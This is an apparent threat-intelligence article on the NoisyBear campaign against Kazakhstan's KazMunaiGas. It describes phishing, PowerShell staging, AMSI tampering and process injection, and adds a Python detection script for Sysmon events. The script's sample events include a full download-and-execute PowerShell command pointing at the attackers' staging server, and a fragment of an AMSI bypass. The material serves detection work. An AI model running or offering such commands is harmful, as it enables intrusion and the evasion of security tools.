Anatomy of a Cyberattack: Inside the Campaign Against Kazakhstan’s Energy Sector
The Seqrite Labs APT-Team has uncovered a new campaign targeting Kazakhstan’s energy sector. Tracked since April 2025, the operation has been attributed to a previously unknown group, now dubbed NoisyBear. Its primary victim was the national oil and gas company KazMunaiGas (KMG). Attackers sent employees emails from spoofed corporate addresses, disguising them as announcements about staffing changes and payroll. The attachments mimicked internal IT documents, written in both Russian and Kazakh, adorned with the KMG logo, and marked with an urgent request to “verify data by May 15, 2025.”
The initial infection vector was a ZIP archive named “График.zip” (“Schedule.zip”) containing three items: a text file with instructions, a decoy document, and a shortcut titled “График зарплат.lnk” (“Salary Schedule.lnk”). Opening the shortcut ran a PowerShell command that fetched a batch script from a remote server at 77.239.125.41:8443, wrote it into a public Windows user directory, and launched it from there. Analysts found several variants of the shortcut, altered just enough to slip past static signatures, but all of them pulled from the same server.
The next stage ran batch scripts such as 123.bat and it.bat, which fetched a set of PowerShell modules collectively tracked as DOWNSHELL. One module neutralized the Antimalware Scan Interface (AMSI), the hook through which security products inspect PowerShell code before it executes, by using .NET reflection to tamper with AMSI's internal state inside the PowerShell process. Another injected shellcode directly into explorer.exe. For this the attackers relied on PowerSploit helpers that resolve and call Win32 API functions from PowerShell at runtime, so memory could be allocated in the target process and the payload written into it without going through the more conspicuous compiled-helper route. The injected payloads were Meterpreter reverse shells delivered with the classic CreateRemoteThread injection technique (allocate memory in the target, write the shellcode, start a new thread on it); other code fragments pointed to preparations for reflective DLL injection, again built on PowerSploit libraries.
The final stage was a DLL implant, a 64-bit loader that used a semaphore and other named kernel objects to limit how many instances ran at once. For stealth it spawned a fresh rundll32.exe in a suspended state, wrote its shellcode into that process, redirected the primary thread to the shellcode by rewriting the thread's context (the SetThreadContext approach rather than creating a remote thread), and then resumed the thread. Once running, the hollowed rundll32.exe connected back to a C2 server, giving the attackers persistent access to the host.
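The chain described above (LNK-launched PowerShell cradle, batch stager run from the Public directory, AMSI tampering, CreateRemoteThread into explorer.exe, a hollowed rundll32.exe beaconing out) maps onto a handful of endpoint-telemetry checks. The Python below is an added example written for this page, not code from Seqrite Labs or from the report. It runs those checks over constructed Sysmon-style events (EventID 1 process creation, 3 network connection, 8 CreateRemoteThread) plus a PowerShell 4104 script-block record. The staging IP and port, the batch names, and the explorer.exe and rundll32.exe roles come from the article; the command lines, the C2 address 198.51.100.7 and the AMSI marker strings (AmsiUtils and friends, as used by the common .NET-reflection bypass) are assumptions made for illustration.

```python
"""Detection heuristics for the Operation BarrelFire chain over Sysmon-style events.

Added illustration for this page, not Seqrite Labs code. Field names follow Sysmon
(Image, ParentImage, CommandLine, SourceImage, TargetImage, DestinationIp/Port) and
the PowerShell operational log (ScriptBlockText); every sample event is constructed.
"""
import re

# Indicators stated in the article.
STAGING_HOST = "77.239.125.41"
STAGING_PORT = "8443"
STAGER_BATCH_NAMES = ("123.bat", "it.bat")

# Assumption: strings typical of the .NET-reflection AMSI bypass. The article only says
# "internal .NET parameters" were modified, so these are heuristics, not published IOCs.
AMSI_MARKERS = ("amsiutils", "amsiinitfailed", "amsicontext")

CRADLE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", re.I)
PUBLIC_DIR = re.compile(r"c:\\users\\public\\", re.I)
# rundll32.exe with nothing after the image path: legitimate use always names a DLL and
# an export, so a bare launch only makes sense as a host for injected code.
BARE_RUNDLL32 = re.compile(r'^\s*"?(?:[a-z]:\\[^"]*\\)?rundll32(?:\.exe)?"?\s*$', re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_create(ev: dict) -> list[str]:
    """Sysmon event 1: process creation."""
    hits = []
    img, parent = basename(ev.get("Image", "")), basename(ev.get("ParentImage", ""))
    cmd = ev.get("CommandLine", "")
    low = cmd.lower()
    if img == "powershell.exe" and parent == "explorer.exe" and CRADLE.search(cmd):
        hits.append("stage1: PowerShell download cradle launched from explorer.exe (LNK pattern)")
        if STAGING_HOST in cmd and STAGING_PORT in cmd:
            hits.append(f"stage1: contacts known staging server {STAGING_HOST}:{STAGING_PORT}")
        if PUBLIC_DIR.search(cmd):
            hits.append("stage1: payload written under C:\\Users\\Public")
    if img == "cmd.exe" and PUBLIC_DIR.search(cmd) and any(n in low for n in STAGER_BATCH_NAMES):
        hits.append("stage2: known DOWNSHELL stager batch run from C:\\Users\\Public")
    if img == "rundll32.exe" and BARE_RUNDLL32.match(cmd):
        hits.append("stage4: rundll32.exe started with no DLL argument (injection host candidate)")
    return hits


def check_script_block(ev: dict) -> list[str]:
    """PowerShell operational log event 4104: script block text."""
    text = ev.get("ScriptBlockText", "").lower()
    if any(m in text for m in AMSI_MARKERS):
        return ["stage2: script block touches AMSI internals (reflection bypass pattern)"]
    return []


def check_remote_thread(ev: dict) -> list[str]:
    """Sysmon event 8: CreateRemoteThread."""
    src, tgt = basename(ev.get("SourceImage", "")), basename(ev.get("TargetImage", ""))
    if src == "powershell.exe" and tgt == "explorer.exe":
        return ["stage3: CreateRemoteThread from powershell.exe into explorer.exe"]
    return []


def check_network(ev: dict) -> list[str]:
    """Sysmon event 3: network connection."""
    if basename(ev.get("Image", "")) == "rundll32.exe":
        return [f"stage4: rundll32.exe connected out to {ev.get('DestinationIp')}:{ev.get('DestinationPort')}"]
    return []


CHECKS = {1: check_process_create, 3: check_network, 8: check_remote_thread, 4104: check_script_block}


def analyze(events: list[dict]) -> dict:
    """Run every check and report which stages of the chain were observed."""
    findings = [hit for ev in events for hit in CHECKS.get(ev.get("EventID"), lambda e: [])(ev)]
    stages = sorted({f.split(":", 1)[0] for f in findings})
    return {"findings": findings, "stages": stages, "chain": len(stages) >= 3}


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
EXPLORER = "C:\\Windows\\explorer.exe"
RUNDLL32 = "C:\\Windows\\System32\\rundll32.exe"

# Constructed events modelling the chain; the command lines, the URL path, the truncated
# script block and the C2 address are invented for the example.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": EXPLORER, "CommandLine":
        "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadFile("
        "'http://77.239.125.41:8443/123.bat','C:\\Users\\Public\\123.bat'); & C:\\Users\\Public\\123.bat\""},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe", "ParentImage": PS,
     "CommandLine": "cmd.exe /c \"C:\\Users\\Public\\123.bat\""},
    {"EventID": 4104, "ScriptBlockText": "$t=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils') ..."},
    {"EventID": 8, "SourceImage": PS, "TargetImage": EXPLORER},
    {"EventID": 1, "Image": RUNDLL32, "ParentImage": EXPLORER, "CommandLine": "\"" + RUNDLL32 + "\""},
    {"EventID": 3, "Image": RUNDLL32, "DestinationIp": "198.51.100.7", "DestinationPort": 443},
]
BENIGN_EVENTS = [
    {"EventID": 1, "Image": PS, "ParentImage": EXPLORER, "CommandLine": "powershell.exe -c Get-Date"},
    {"EventID": 1, "Image": RUNDLL32, "ParentImage": EXPLORER,
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
]

if __name__ == "__main__":
    for line in analyze(SAMPLE_EVENTS)["findings"]:
        print(line)
```

The thread-context hijack into the suspended rundll32.exe produces no Sysmon event 8, because no remote thread is created; that is why the example keys on a rundll32.exe launched without a DLL argument followed by an outbound connection from that process. Treat the cradle and directory patterns as environment-specific heuristics to tune, not as a signature, and treat the chain verdict (three or more stages seen on one host) as the trigger for investigation rather than any single hit.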
The NoisyBear infrastructure itself is noteworthy. Some servers were hosted by Aeza Group LLC, a bulletproof-hosting provider that was already under U.S. sanctions. Alongside the malicious tooling, the infrastructure housed open-source red-team frameworks such as PowerSploit and Metasploit, as well as decoy websites themed around fitness and healthcare and aimed at Russian-speaking visitors.
The campaign, codenamed Operation BarrelFire, showcases the full cycle of a targeted attack: from email account compromise and phishing distribution to advanced code injection and evasion of built-in defenses. Its focus on Kazakhstan’s state-owned oil and gas giant underscores the campaign’s strategic intent, suggesting potential political or economic motivations behind NoisyBear’s activities.